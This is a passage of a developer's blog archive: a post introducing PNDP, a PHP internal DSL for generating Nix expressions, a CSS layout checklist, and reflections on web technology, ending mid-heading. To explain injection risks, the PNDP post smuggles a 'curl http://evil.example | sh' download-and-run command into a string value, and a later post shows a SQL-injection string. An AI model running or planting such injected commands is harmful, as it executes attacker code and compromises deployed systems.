Monday, September 11, 2017

PNDP: An internal DSL for Nix in PHP

It has been a while since I wrote a Nix-related blog post. In many of my earlier Nix blog posts, I have elaborated on various Nix applications and their benefits.

However, when you are developing a product or service, you typically do not only want to use configuration management tools, such as Nix -- you may also want to build a platform that is tailored towards your needs, so that common operations can be executed structurally and conveniently.

When it is desired to integrate custom solutions with Nix-related tools, you basically have one recurring challenge -- you must generate deployment specifications in the Nix expression language.

The most obvious solution is to use string manipulation to generate the expressions we want, but this has a number of disadvantages. Foremost, composing strings is not a very intuitive activity -- it is not always obvious to see what the end result would be by looking at the code.

Furthermore, it is difficult to ensure that a generated expression is correct and safe. For example, if a string value is not properly escaped, it may be possible to inject arbitrary deployment code putting the security of the deployed system at risk.
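To illustrate the risk, consider the following contrived sketch (an illustration on my part, not code from any real tool) -- if the value is not escaped, the embedded double quote terminates the generated string early and the remainder is injected as arbitrary Nix code:

```php
// A contrived sketch of the string manipulation approach and its pitfall.
// The embedded quote terminates the Nix string early, and the rest of the
// value is injected as arbitrary deployment code:
$description = 'hello"; postInstall = "curl http://evil.example | sh';
$expr = '{ description = "'.$description.'"; }';
// yields: { description = "hello"; postInstall = "curl http://evil.example | sh"; }
```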

For these reasons, I developed NiJS, an internal DSL for Nix in JavaScript, a couple of years ago to make integration with JavaScript-based applications more convenient. Most notably, NiJS is used by node2nix to generate Nix expressions from NPM package deployment specifications.

I have been doing PHP development in the last couple of weeks and realized that I needed a similar solution for this language. In this blog post, I will describe PNDP, an internal DSL for Nix in PHP, and show how it can be used.

Composing Nix packages in PHP

The Nix packages repository follows a specific convention for organizing packages -- every package is a Nix expression file containing a function definition describing how to build a package from source code and its build-time dependencies.

A top-level composition expression file provides all the function invocations that build variants of packages (typically only one per package) by providing the desired versions of the build-time dependencies as function parameters.

Every package definition typically invokes stdenv.mkDerivation {} (or abstractions built around it) that composes a dedicated build environment in which only the specified dependencies can be found and other kinds of precautions are taken to improve build reproducibility. In this builder environment, we can execute many kinds of build steps, such as running GNU Make, CMake, or Apache Ant.

In our internal DSL in PHP we can replicate these conventions using PHP language constructs. We can compose a proxy to the stdenv.mkDerivation {} invocation in PHP by writing the following class:

namespace Pkgs;
use PNDP\AST\NixFunInvocation;
use PNDP\AST\NixExpression;

class Stdenv
{
    public function mkDerivation($args)
    {
        return new NixFunInvocation(new NixExpression("pkgs.stdenv.mkDerivation"), $args);
    }
}

In the above code fragment, we define a class named: Stdenv exposing a method named: mkDerivation. The method composes an abstract syntax tree for a function invocation to stdenv.mkDerivation {} using an arbitrary PHP object as a parameter.

With the proxy shown above, we can create our own packages in PHP by providing a function definition that specifies how a package can be built from source code and its build-time dependencies:

namespace Pkgs;
use PNDP\AST\NixURL;

class Hello
{
    public static function composePackage($args)
    {
        return $args->stdenv->mkDerivation(array(
            "name" => "hello-2.10",

            "src" => $args->fetchurl(array(
                "url" => new NixURL("mirror://gnu/hello/hello-2.10.tar.gz"),
                "sha256" => "0ssi1wpaf7plaswqqjwigppsg5fyh99vdlb9kzl7c9lng89ndq1i"
            )),

            "doCheck" => true,

            "meta" => array(
                "description" => "A program that produces a familiar, friendly greeting",
                "homepage" => new NixURL(""),
                "license" => "GPLv3+"
            )
        ));
    }
}
The above code fragment defines a class named 'Hello' exposing one static method named: composePackage(). The composePackage method invokes the stdenv.mkDerivation {} proxy (shown earlier) to build GNU Hello from source code.

In addition to constructing a package, the above code fragment also follows the PHP conventions for modularization -- in PHP it is a common practice to modularize code chunks into classes that reside in their own namespace. For example, by following these conventions, we can also automatically load our package classes by using an autoloading implementation that follows the PSR-4 recommendation.

We can create compositions of packages as follows:

class Pkgs
{
    public $stdenv;

    public function __construct()
    {
        $this->stdenv = new Pkgs\Stdenv();
    }

    public function fetchurl($args)
    {
        return Pkgs\Fetchurl::composePackage($this, $args);
    }

    public function hello()
    {
        return Pkgs\Hello::composePackage($this);
    }
}

As with the previous example, the composition example is a class. In this case, it exposes variants of packages by calling the functions with their required function arguments. In the above example, there is only one variant of the GNU Hello package. As a result, it suffices to just propagate the object itself as build parameters.

Contrary to the Nix expression language, we must expose each package composition as a method -- the Nix expression language is a lazy language that only invokes functions when their results are needed, whereas PHP is an eager language that evaluates them at construction time.

An implication of using eager evaluation is that opening the composition module triggers all packages to be built. By wrapping the compositions into methods, we can make sure that only the requested packages are evaluated when needed.

Another practical implication of creating methods for each package composition is that it can become quite tedious if we have many of them. PHP offers a magic method named: __call() that gets invoked when we invoke a method that does not exist. We can use this magic method to automatically compose a package based on the method name:

public function __call($name, $arguments)
{
    // Compose the class name from the method name
    $className = ucfirst($name);
    // Compose the name of the method that composes the package
    $methodName = 'Pkgs\\'.$className.'::composePackage';
    // Prepend $this so that it becomes the first function parameter
    array_unshift($arguments, $this);
    // Dynamically invoke the class' composition method
    return call_user_func_array($methodName, $arguments);
}

The above method takes the (non-existent) method name, converts it into the corresponding class name (by using the camel case naming convention), invokes the package's composition method using the composition object itself as a first parameter, and any other method parameters as successive parameters.
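For example, with the __call() method in place, the explicit hello() method shown earlier is no longer needed -- a sketch:

```php
$pkgs = new Pkgs();

// No hello() method is defined anymore -- __call() intercepts the
// invocation and dispatches it to: Pkgs\Hello::composePackage($pkgs)
$expr = $pkgs->hello();
```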

Converting PHP language constructs into Nix language constructs

Everything that PNDP does boils down to the phpToNix() function that automatically converts most PHP language constructs into semantically equivalent or similar Nix language constructs. For example, the following PHP language constructs are converted to Nix as follows:

  • Variables of type boolean, integer or double are converted verbatim.
  • A string will be converted into a string in the Nix expression language, and conflicting characters, such as the backslash and double quote, will be escaped.
  • In PHP, arrays can be sequential (when all elements have numeric keys that appear in numeric order) or associative in the remainder of the cases. The generator tries to detect what kind of array we have. It recursively converts sequential arrays into Nix lists of Nix language elements, and associative arrays into Nix attribute sets.
  • An object that is an instance of a class will be converted into a Nix attribute set exposing its public properties.
  • A NULL reference gets converted into a Nix null value.
  • Variables that have an unknown type or are a resource will throw an exception.
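A sketch of the conversion rules listed above (the NixGenerator class name is an assumption on my part -- the blog post only mentions the phpToNix() function):

```php
use PNDP\NixGenerator; // assumed location of phpToNix()

$spec = array(
    "enable" => true,                 // boolean -> Nix boolean: true
    "port" => 8080,                   // integer -> Nix integer: 8080
    "motd" => "say \"hi\"",           // string -> escaped Nix string
    "flags" => array("-v", "-q"),     // sequential array -> Nix list
    "env" => array("LANG" => "C"),    // associative array -> attribute set
);

echo NixGenerator::phpToNix($spec);
```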

As with NiJS (and JavaScript), the PHP host language does not provide equivalents for all Nix language constructs, such as values of the URL type, or encoding Nix function definitions.

You can still generate these objects by composing an abstract syntax tree from objects that are instances of the NixObject class. For example, by composing a NixURL object, we can generate a value of the URL type in the Nix expression language.

Arrays are a bit confusing in PHP, because you do not always know in advance whether one will yield a list or an attribute set. To make these conversions explicit and to prevent generation errors, arrays can be wrapped inside a NixList or NixAttrSet object.
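For example (the constructor signatures are an assumption on my part):

```php
use PNDP\AST\NixList;
use PNDP\AST\NixAttrSet;

// Force the conversion, regardless of how the array keys are laid out:
$list  = new NixList(array("foo", "bar"));  // always becomes a Nix list
$attrs = new NixAttrSet(array(0 => "foo")); // always becomes an attribute set
```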

Building packages programmatically

The PNDPBuild::callNixBuild() function can be used to build a generated Nix expression, such as the GNU Hello example shown earlier:

/* Evaluate the package */
$expr = PNDPBuild::evaluatePackage("Pkgs.php", "hello", false);

/* Call nix-build */
PNDPBuild::callNixBuild($expr, array());

In the code fragment above, we open the composition class file, named: Pkgs.php, and evaluate the hello() method to generate the Nix expression. Finally, we call the callNixBuild() function, in which the generated expression is evaluated by the Nix package manager. When the build succeeds, the resulting Nix store path is printed on the standard output.

Building packages from the command-line

As the previous code example is so common, there is also a command-line utility that can execute the same task. The following instruction builds the GNU Hello package from the composition class (Pkgs.php):

$ pndp-build -f Pkgs.php -A hello

It may also be useful to see what kind of Nix expression is generated for debugging or testing purposes. The --eval-only option prints the generated Nix expression on the standard output:

$ pndp-build -f Pkgs.php -A hello --eval-only

We can also nicely format the generated expression to improve readability:

$ pndp-build -f Pkgs.php -A hello --eval-only --format


Conclusion

In this blog post, I have described PNDP: an internal DSL for Nix in PHP.

PNDP is not the first internal DSL I have developed for Nix. A couple of years ago, I also wrote NiJS: an internal DSL in JavaScript. PNDP shares a lot of concepts and implementation details with NiJS.

Contrary to NiJS, the functionality of PNDP is much more limited -- I have developed PNDP mainly for code generation purposes. In NiJS, I have also been exploring the abilities of the JavaScript language, such as exposing JavaScript functions in the Nix expression language, and the possibilities of an internal DSL, such as creating an interpreter that makes it a primitive standalone package manager. In PNDP, all this extra functionality is missing, since I have no practical need for them.

In a future blog post, I will describe an application that uses PNDP as a generator.


Availability

PNDP can be obtained from Packagist as well as my GitHub page. It can be used under the terms and conditions of the MIT license.

Tuesday, August 29, 2017

A checklist of minimalistic layout considerations for web applications

As explained in my previous blog post, I used to be quite interested in web technology and spent considerable amounts of time developing my own framework providing solutions for common problems that I used to face, such as layout management and data management.

Another challenge that you cannot avoid is the visual appearance of your web application. Today, there are many frameworks and libraries available allowing you to do impressive things, such as animated transitions, fade in/fade out effects and so on.

Unfortunately, many of these "modern" solutions also have a number of big drawbacks -- typically, they are big and complex JavaScript-based frameworks significantly increasing the download size of pages and the amount of required system resources (e.g. CPU, GPU, battery power) to render a page. As a result, it is not uncommon that the download size of a web site equals that of the Doom video game, and that pages feel slow and sluggish.

Some people (such as the author of this satirical website) suggest that most (all?) visual aspects are unnecessary and that simply a "vanilla" page displaying information suffices to provide a user what he needs. I do not entirely agree with this viewpoint as many web sites are not just collections of pages but complex information systems. Complex information systems require some means of organizing data including a layout that reflects this, such as menu panels that guide a user through the desired sets of information.

I know many kinds of tricks (and hacks) to implement layouts and visual aspects, but one thing that I am not particularly good at is designing visuals myself. There is a big pool of layout considerations to choose from and many combinations that can be made. Some combinations of visual aspects are good, others are bad -- I simply lack the intuition to make the right choices. This does not apply to web design only -- when I had to choose furniture for my house I basically suffered from the same problem. As a result, I have created (by accident) a couple of things that look nice and other things that look dreadful :-)

Although I have worked with designers, it is not always possible to consult one, in particular for non-commercial/more technical projects.

In this blog post, I have gathered a number of minimalistic layout considerations that, regardless of the objective of the system and the absence of design intuition, I find worth considering, with some supporting information so that rational decisions can be made. Furthermore, they are relatively simple to apply and do not require any framework.

Text size

A web application's primary purpose is providing information. As a consequence, how you present text is very important.

A number of studies (such as this one by Jakob Nielsen in 1997) show that visitors of web pages do not really read, but scan for information. Although this study was done many years ago, it still applies to today's screens, such as tablets and devices designed for reading books, such as the Kindle.

Because users typically read much slower from a screen than from paper and hardly read sections entirely, it is a very good idea to pick a font size that is large enough.

In most browsers, the default font size is set to 16 pixels. Studies suggest that this size is anything but too small, in particular for the high resolution screens that we use nowadays. Moreover, a font size of 16px on modern screens roughly matches the font size of a (physical) book.

Furthermore, CSS allows you to define font sizes absolutely or relatively. In my opinion (supported by this article), it is a good practice to use relative font sizes, because it is a good habit to allow users to control the size of the fonts.

For me, typically the following CSS setting suffices:

    font-size: 100%;


Spacing

When I was younger, I had the tendency to put as much information on a page as possible, such as densely written text, images and tables. At some point, I worked with a designer who constantly reminded me that I should keep enough space between page elements.

(As a sidenote: space should not necessarily be white space, but could also be the background color or background gradient. Some designers call this kind of space "negative spacing").

Why is sufficient negative spacing a good thing? According to some sources, filling a page with too many details, such as images, makes it difficult to maintain a user's attention. For example, if a page contains too many graphics or colors that appear unrelated to the rest of the page, a user will quickly skip details.

Furthermore, some studies suggest that negative spacing is an effective way to emphasize important elements of a page and a very effective way to direct the flow of a page.

From an implementation perspective, there are many kinds of HTML elements that could be adjusted (from the browser's default settings) to use a bit of extra spacing, such as:

  • Text: I typically adjust the line-height to 1.2em, increasing the space between the lines of a paragraph.
  • For divs and other elements that define sections, I increase their margins and paddings. Typically I would set them to at least: 1em.
  • For table and table cells I increase their paddings to 0.5em.
  • For preformatted text: pre I use a padding value of at least 1em.
  • For list items (entries of an unordered or ordered list) I add a bit of extra spacing on top, e.g. li { margin: 0.2em 0; }.
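The adjustments above roughly translate to the following stylesheet (a sketch; tune the values to taste):

```css
p         { line-height: 1.2em; } /* more space between lines of text */
div       { margin: 1em; padding: 1em; }
table, td { padding: 0.5em; }
pre       { padding: 1em; }
li        { margin: 0.2em 0; }    /* extra spacing between list items */
```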

Some people would argue that the above list of adjustments is still quite conservative and that even more spacing should be considered.

Font color/foreground contrast

Another important thing is to pick the right foreground colors (such as the text color) and ensure that they have sufficient contrast -- for example, light grey colored text on a white background is very difficult for users to read.

In most browsers, the default setting is to have a white background and black colored text. Although this color scheme maximizes contrast, too much contrast also has a disadvantage -- it maximizes a user's attention span for a while, but a user cannot maintain such a level of attention indefinitely.

When displaying longer portions of text, it is typically better to lower the contrast a bit, but not too much. For example, when I want to display black colored text on a white background, I tune down the contrast a bit by setting the text color to dark grey: #444; as opposed to black: #000; and the background color to very light grey: #ddd; as opposed to white: #fff;.
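In CSS, this boils down to:

```css
body {
    color: #444;            /* dark grey text, as opposed to black: #000 */
    background-color: #ddd; /* very light grey, as opposed to white: #fff */
}
```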

Defining panels and sections

A web application is typically much more than just a single page of content. Typically, they are complex information systems displaying many kinds of data. This data has to be divided, categorized and structured. As a result, we also need facilities that guide users through these sets of information, such as menu and content panels.

Creating a layout with "panels" turns out to be quite a complex problem, for which various kinds of strategies exist each having their pros and cons. For example, I have used the following techniques:

  • Absolute positioning. We add the property: position: absolute; to a div and we use the left, right, top and bottom properties to specify the coordinates of the top left and bottom right position of the panel. As a result, the div automatically gets positioned (relative to the top left position of the screen) and automatically gets a width and height. For the sections that need to expand, e.g. the contents panel displaying the text, we use the overflow: auto; property to enable vertical scroll bars if needed.

    Although this strategy seems to do mostly what I want, it also has a number of drawbacks -- the position of the panels is fixed. For desktops this is usually fine, but for screens with a limited height (such as mobile devices and tablets) this is quite impractical.

    Moreover, it used to be a big problem when Internet Explorer 6 was still the dominant browser -- IE6 did not implement the property that automatically derives the width and height, requiring me to implement a workaround stylesheet using JavaScript to compute the width and heights.
  • Floating divs is a strategy that is more friendly to displays with a limited height but has different kinds of challenges. Basically, by adding a float property to each panel, e.g. float: left; and specifying a width we can position columns next to each other. By using a clear hack, such as: <div style="clear: both;"></div> we can position a panel right beneath another panel.

    This strategy mostly makes sense despite the fact that the behaviour of floating elements is somewhat strange. One of the things that is very hard to solve is to create a layout in which columns have an equal height when their heights are not known in advance -- someone has written a huge blog post with all kinds of strategies. I, for example, implemented the "One True Layout Method" (a margin-padding-overflow hack) quite often.
  • Flexbox is yet another (more modern) alternative and the most powerful solution IMO so far. It allows you to concisely specify how divs should be positioned, wrapped and sized. The only downside I see so far is that these properties are relatively new and require very new implementations of browser layout engines. Many users typically do not bother that much to upgrade their browsers, unless they are forced.
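For example, a two-column layout with a fixed-width menu panel and an expanding contents panel can be sketched with flexbox as follows (the element ids are just an illustration):

```css
#container { display: flex; }            /* lay out children as columns */
#menu      { width: 12em; }              /* fixed-width menu column */
#contents  { flex: 1; overflow: auto; }  /* takes up the remaining width */
```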

Resolution flexibility (a.k.a. responsive web design)

When I just gained access to the Internet, nearly all web page visitors used to be desktop users. Today, however, a substantial number of visitors use different kinds of devices, having small screens (such as phones and tablets) and very big screens (such as TVs).

To give all these visitors a relatively good user experience, it is important to make the layout flexible enough to support many kinds of resolutions. Some people call this kind of flexibility responsive web design, but I find that term somewhat misleading.

Besides the considerations shown earlier, I also typically implement the following aspects in order to become even more flexible:

  • Eliminating vertical menu panels. When we have two levels of menu items, I typically display the secondary menu panel on the left on the screen. For desktops (and bigger screens) this is typically OK, but for smaller displays it eats too much space from the section that displays the contents. I typically use media queries to reconfigure these panels in such a way that the items on these menu panels are aligned horizontally by default and, when the screen width is big enough, they will be aligned vertically.
  • Making images dynamically resizable. Images, such as photos in a gallery, may be too big to properly display on a smaller screen, such as a phone. Fortunately, by providing the max-width setting we can adjust the style of images in such a way that their maximum width never exceeds the screen size and their dimensions get scaled accordingly:

        max-width: 100%;
        width: auto;
        height: auto;
  • Adding horizontal scroll bars, when needed. For some elements, it is difficult to resize them in such a way that they never exceed the screen width, such as sections of preformatted text which I typically use to display code fragments. For these kinds of elements I typically configure the overflow-x: auto; property so that horizontal scroll bars appear when needed.
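The menu panel reconfiguration described above can be sketched with a media query as follows (the id and the breakpoint are just an illustration):

```css
/* Default: submenu items aligned horizontally */
#submenu a { display: inline-block; }

/* On sufficiently wide screens: align them vertically, as a side panel */
@media only screen and (min-width: 1024px) {
    #submenu a { display: block; }
}
```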

Picking colors

In addition to the text and the background colors, we may also want to pick a couple of additional colors. For example, we need different colors for hyperlinks so that it becomes obvious to users what is clickable and what not, and whether a link has already been visited or not. Furthermore, providing distinct colors for the menu panels, headers, and buttons would be nice as well.

Unfortunately, when it comes to picking colors, my intuition lets me down completely -- I do not know what "nice colors" are or which colors fit best together. As a result, I always have a hard time making the right choices.

Recently, I discovered a concept called "color theory" that lets you decide, somewhat rationally, what colors to pick. The basic idea behind color theory is that you pick a base color and then apply a color scheme to get a number of complementary colors, such as:

  • Triadic. Composed of 3 colors on separate ends of the color spectrum.
  • Compound. One color is selected in the same area of the color spectrum and two colors are chosen from opposite ends of the color spectrum.
  • Analogous. Careful selection of colors in the same area of the color spectrum.

A particularly handy online tool (provided by the article shown above) is paletton, which seems to provide me good results -- it supports various color schemes, has a number of export functions (including CSS) and a nice preview function that shows you what a web page would look like if you apply the generated color scheme.

Unfortunately, I have not found any free/open-source solutions or a GIMP plugin allowing me to do the same.


Printing

Something that is typically overlooked by many developers is printing. For most interactive web sites this is not too important, but for information systems, including reservation systems, it is also a good practice to implement proper printing support.

I consider it to be a good practice to hide non-relevant panels, such as the menu panels:

@media only print
{
    #header, #menu
    {
        display: none;
    }
}

Furthermore, it is also a good practice to tune down the amount of colors a bit.
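For example, by falling back to plain black-on-white in the print stylesheet (a sketch; the hyperlink rule is just an illustration):

```css
@media only print {
    body { color: #000; background-color: #fff; } /* maximum contrast on paper */
    a    { color: #000; }                         /* no colored hyperlinks */
}
```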

A simple example scenario

As an experiment to test the above listed concerns (e.g. text-size, foreground contrast, using paletton to implement color theory and NOT trusting my intuition), I ended up implementing the following "design":

This is what it looks like on a desktop browser:

For printing, the panels and colors are removed:

The page is even functional in a text oriented browser (w3m):

By using media queries, we can adjust the positioning of the sub menu to make more space available for the contents panel on a mobile display (my Android phone):

The layout does not look shiny or fancy, but it appears functional to me. But hey, don't ask me too much, since I simply lack the feeling for design. :-)

In my previous blog post, I have described my own custom web framework for which I released a number of additional components. I have also implemented an example repository with simple demonstration applications. I have decided to use my "rationally crafted layout" to make them look a bit prettier.


Conclusion

In this blog post, I have gathered a collection of minimalistic layout considerations for myself that, regardless of the objective of a web application, I find worth considering. Moreover, these concerns can be applied mostly in a rational way, which is good for people like me who lack design intuition.

Although I have described many aspects in this blog post, applying the above considerations will not produce any fancy/shiny web pages. For example, you could still implement many additional visual aspects, such as rounded corners, shadows, gradients, animated transitions, fade-ins and fade-outs, and so on.

Moreover, from writing this blog post I learned a thing or two about usability and HTML/CSS tricks. However, I again observed that the more you know, the more you realize that you do not know. For example, there are even more specialized studies available, such as one about the psychology of colors that, for example, shows that women prefer blue, purple, and green, and men prefer blue, green, and black.

This, however, is where I draw the line when it comes to learning design skills -- it made me realize why I prefer not to become a front-end/design specialist. Knowing some things about design is always useful, but the domain is much deeper and more complex than I initially thought.

The only thing that I still like to do is finding additional, simple, rationally applicable design considerations. Does anyone have some additional suggestions for me?

Sunday, July 2, 2017

Some reflections on my experiences with web technology

It has been a while since I wrote my last blog post. In the last couple of months, I have been working on many kinds of things, such as resurrecting the most important components of my personal web framework (that I have developed many years ago) and making them publicly available on GitHub.

There are a variety of reasons for me to temporarily switch back to this technology area for a brief period of time -- foremost, there are a couple of web sites still using pieces of my custom framework, such as those related to my voluntary work. I recently had to make changes, mostly maintenance-related, to these systems.

The funny thing is that most people do not consider me a web development (or front-end) person and this has an interesting history -- many years ago (before I started doing research) I always used to refer to "web technology" as one of my main technical interests. Gradually, my interest started to fade, up until the point that I stopped mentioning it.

I started this blog somewhere in the middle of my research, mainly to provide additional practical information. Furthermore, I have been using my blog to report on everything I do open-source related.

If I had started this blog several years earlier, then many articles would have been related to web technology. Back then, I spent considerable amounts of time investigating techniques, problems and solutions. Retrospectively, I regret that it took me so long to make writing a recurring habit as part of my work -- many interesting discoveries were never documented and have become forgotten knowledge.

In this blog post, I will reflect on my web programming experiences, describe some of the challenges I used to face and the solutions I implemented.

In the beginning: everything looked great

I vividly remember the early days in which I was just introduced to the internet, somewhere in the mid 90s. Around that time Netscape Navigator 2.0 was still the dominant and most advanced web browser.

Furthermore, the things I could do on the internet were very limited -- today we are connected to the internet almost 24 hours a day (mainly because many of us have smart phones allowing us to do so), but back then I only had a very slow 33K6 dial-up modem and internet access for only one hour a week.

Aside from the fact that it was quite an amazing experience to be connected to the world despite these limitations, I was also impressed by the underlying technology to construct web sites. It did not take long for me to experiment with these technologies myself, in particular HTML.

Quite quickly I was able to construct a personal web page whose purpose was simply to display some basic information about myself. Roughly, what I did was something like this:

<html>
  <head>
    <title>My homepage</title>
  </head>

  <body bgcolor="#ff0000" text="#000000">
    <h1>Hello world!</h1>

    <p>
      Hello, this is my homepage.
      <img src="image.jpg" alt="Image">
    </p>
  </body>
</html>

It was simply a web page with a red colored background displaying some text, hyperlinks and images:

You may probably wonder what is so special about building a web page with a dreadful background color, but before I was introduced to web technology, my programming experience was limited to various flavours of BASIC (such as Commodore 64, AMOS, GW and Quick BASIC), Visual Basic, 6502 assembly and Turbo Pascal.

Building user interfaces with these kinds of technologies was quite tedious and somewhat impractical compared to using web technology -- for example, you had to programmatically define your user interface elements, size them, position them, define style properties for each individual element and program event handlers to respond to user events, such as mouse clicks.

With web technology this suddenly became quite easy and convenient -- I could now concisely express what I wanted and the browser took care of the rendering parts.

Unknowingly, I was introduced to a discipline called declarative programming -- I could describe what I wanted as opposed to specifying how to do something. Writing applications declaratively had all kinds of advantages beyond the ability to express things concisely.

For example, because HTML code is high-level (not entirely, but is supposed to be), it does not really matter much what browser application you use (or underlying platform, such as the operating system) making your application quite portable. Rendering a paragraph, a link, image or button can be done on many kinds of different platforms from the same specification.

Another powerful property is that your application can degrade gracefully. For example, when using a text-oriented browser, your web application should still be usable without the ability to display graphics. The alternate text (alt) attribute of the image element should ensure that the image description is still visible. Even when no visualization is possible (e.g. for visually impaired people), you could, for example, use a Text to Speech system to interpret your pages' content.

Moreover, the introduction of Cascading Style Sheets (CSS) made it possible to separate the style concern from the page structure and contents, making the code of your web page much more concise. Before CSS, extensive use of presentational tags could still make your code quite messy. Separation of the style concern also made it possible to replace the stylesheet without modifying the HTML code to easily give your page a different appearance.

To deal with visual discrepancies between browser implementations, HTML was standardized and standards-mode rendering was introduced when an HTML doctype was added to an HTML file.

What went wrong?

I have described a number of appealing traits of web technology in the previous section -- programming applications declaratively from a high level perspective, separation of concerns, portability because of high-level abstractions and standardization, the ability to degrade gracefully and conveniently making your application available to the world.

What could possibly be the reason to lose passion when this technology has so many compelling properties?

I have a long list of anecdotes, but most of my reasons can be categorized as follows:

There are many complex additional concerns

Most web technologies (e.g. HTML, CSS, JavaScript) provide solutions for the front-end, mainly to serve and render pages, but many web applications are much more than simply a collection of pages -- they are in fact complex information systems.

To build information systems, we have to deal with many additional concerns, such as:

  • Data management. User provided data must be validated, stored, transformed into something that can be visually represented, and properly escaped so that it can be inserted into a database (preventing SQL injections).
  • Security. User permissions must be validated on all kinds of levels, such as page level, or section level. User roles must be defined. Secure connections must be established by using the SSL protocol.
  • Scalability. When your system has many users, it will no longer be possible to serve your web application from a single web server because it lacks sufficient system resources. Your system must be decomposed and optimized (e.g. by using caching).
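To illustrate the escaping concern from the first bullet point, the following sketch (with a hypothetical books table) shows why naive string concatenation is dangerous:

```javascript
// Illustration of the escaping concern: composing a query through
// naive string concatenation allows crafted input to change the
// meaning of the query itself (an SQL injection).
function naiveQuery(title) {
  return "SELECT * FROM books WHERE title = '" + title + "'";
}

// A malicious "title" escapes the string literal and adds a condition
// that matches every row in the table:
const query = naiveQuery("x' OR '1'='1");
// query is now: SELECT * FROM books WHERE title = 'x' OR '1'='1'
```

Parameterized queries (e.g. PDO prepared statements in PHP) avoid this entire category of problems, which is why proper escaping and validation layers matter so much in information systems.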

In my experience, the tech companies I used to work for understood these issues, but I also ran into many situations in which non-technical people did not understand that all these things were complicated and necessary.

One time, I even ran into somebody saying: "Well, you can export Microsoft Word documents to HTML pages, right? Why should things be so difficult?".

There is a lack of abstraction facilities in HTML

As explained earlier, programming with HTML and CSS could be considered declarative programming. At the same time, declarative programming is a spectrum -- it is difficult to draw a hard line between what and how -- it all depends on the context.

The same thing applies to HTML -- from one perspective, HTML code can be considered a "what specification" since you do not have to specify how to render a paragraph, image or a button.

In other cases, you may want to do things that cannot be directly expressed in HTML, such as embedding a photo gallery on your web page -- there is no HTML facility allowing you to concisely express that. Instead, you must provide the corresponding HTML elements that implement the gallery, such as the divisions, paragraphs, forms and images. Furthermore, HTML does not provide you any facilities to define such abstractions yourself.

If there are many recurring high level concepts to implement, you may end up copying and pasting large portions of HTML code between pages making it much more difficult to modify and maintain the application.

A consequence of not being able to define custom abstractions in HTML is that it has become very common to generate pages server side. Although this suffices to get most jobs done, generating dynamic content is many times more expensive than serving static pages, which is quite silly if you think too much about it.
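For instance, the gallery abstraction mentioned earlier typically ends up as a server side helper that expands a high-level description into the repetitive markup. A minimal sketch (in JavaScript, with hypothetical names):

```javascript
// Sketch of a server side abstraction that HTML itself cannot express:
// a function expanding a high-level "gallery" description into the
// repetitive divs and images that implement it.
function renderGallery(pictures) {
  const items = pictures.map(picture =>
    '<div class="gallery-item">' +
    '<img src="' + picture.src + '" alt="' + picture.alt + '">' +
    '</div>');
  return '<div class="gallery">' + items.join('') + '</div>';
}

const html = renderGallery([
  { src: "beach.jpg", alt: "The beach" },
  { src: "forest.jpg", alt: "The forest" }
]);
```

Because HTML offers no facility to define such a custom element yourself, a helper like this has to live on the server (or in JavaScript), and every page that needs a gallery has to invoke it.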

A very common server side abstraction I used to implement (in addition to an embedded gallery) is a layout manager allowing you to manage static common sections, a menu structure and dynamic content sections. I ended up inventing such a component because I was used to frames, which became deprecated. Moving away from them required me to reimplement common sections of a page over and over again.

In addition to generated code, using JavaScript has also become quite common, by dynamically injecting code into the DOM or transforming elements. As a result, quite a few pages will not function properly when JavaScript has been disabled or when JavaScript is unsupported.

Moreover, many pages embed a substantial amount of JavaScript, significantly increasing their sizes. A study reveals that the total size of quite a few modern web pages is equal to that of the Doom video game.

There is a conceptual mismatch between 'pages' and 'screens'

HTML is a language designed for constructing pages, not screens. However, information systems typically require a screen-based workflow -- users need to modify data, send their change requests to the server and update their views so that their modifications become visible.

In HTML, there are only two ways to propagate parameters to the server and get feedback -- with hyperlinks (containing GET parameters) or forms. In both cases, a user gets redirected to another page that should display the result of the action.
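Concretely, the two mechanisms look as follows (page and parameter names are hypothetical):

```html
<!-- A hyperlink propagating GET parameters to the server: -->
<a href="books.php?page=2">Next page</a>

<!-- A form sending its field values, after which the user gets
     redirected to a page displaying the result: -->
<form method="post" action="addbook.php">
  <input type="text" name="title">
  <button type="submit">Add book</button>
</form>
```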

For pages displaying tabular data or other complicated data structures, this is quite inconvenient -- we have to rerender the entire page each time we change something and scroll the user back to the location where the change was made (e.g. by defining anchors).

Again, with JavaScript this problem can be solved in a more proper and efficient way -- by programming an event handler (such as a handler for the click event), using the XMLHttpRequest object to send a change message to the server and updating the appropriate DOM elements, we can rerender only the affected parts.

Unfortunately, this again breaks the declarative nature of web technologies and the ability to degrade gracefully -- in a browser that lacks JavaScript support (e.g. text-oriented browsers) this solution will not work.

Also, efficient state management is a complicated problem that you may want to solve by integrating third party JavaScript libraries, such as MobX or Redux.

Layouts are extremely difficult

In addition to the absence of abstractions in HTML (motivating me to develop a layout manager), implementing layouts in general is also something I consider to be notoriously difficult. Moreover, the layout concern is not well separated -- some aspects need to be done in your page structure (HTML code) and other aspects need to be done in stylesheets.

Although changing most visual properties of page elements in CSS is straightforward (e.g. adjusting the color of the background, text or borders), dealing with layout related aspects (e.g. sizing and positioning page elements) is not. In many cases I had to rely on clever tricks and hacks.

One of the weirdest recurring layout tricks I used to implement is a hack to make the height of two adjacent floating divs equal. This is something I commonly used to put a menu panel next to a content panel displaying text and images. You do not know the height of either panel in advance.

I ended up solving this problem as follows. I wrapped the divs in a container div:

<div id="container">
  <div id="left-column">...</div>
  <div id="right-column">...</div>
</div>

and I provided the following CSS stylesheet:

#container {
  overflow: hidden;
}

#left-column {
  float: left;
  padding-bottom: 3000px;
  margin-bottom: -3000px;
}

#right-column {
  float: left;
  padding-bottom: 3000px;
  margin-bottom: -3000px;
}

In the container div, I abuse the overflow property (disabling scroll bars if the height exceeds the screen size). For the panels themselves, I use a large padding value and an equivalent negative margin. The latter hack causes the panels to stretch in such a way that their heights become equal.

(As a sidenote: the above problem can now be solved in a better way using a flexbox layout, but a couple of years ago you could not use this newer CSS feature).
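For comparison, a sketch of the flexbox-based solution (using the same hypothetical ids) -- the columns become flex items, which stretch to the height of the tallest item by default:

```css
#container {
  display: flex; /* the child divs become flex items on one row */
}

#left-column {
  width: 20%; /* fixed share for the menu panel */
}

#right-column {
  flex: 1; /* the content panel takes the remaining width */
}

/* no padding/margin hack needed: flex items stretch to equal height */
```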

The equal-height hack shown above is not an exception. Another notable trick is the clear hack (e.g. <div style="clear: both;"></div>) to ensure that the height of the surrounding div grows automatically with the height of your inner divs.

As usual, JavaScript can be used to abstract these oddities away, but that breaks declarativity. Furthermore, when JavaScript is used for an essential part of your layout, your page will look weird if JavaScript has been disabled.

Interoperability problems

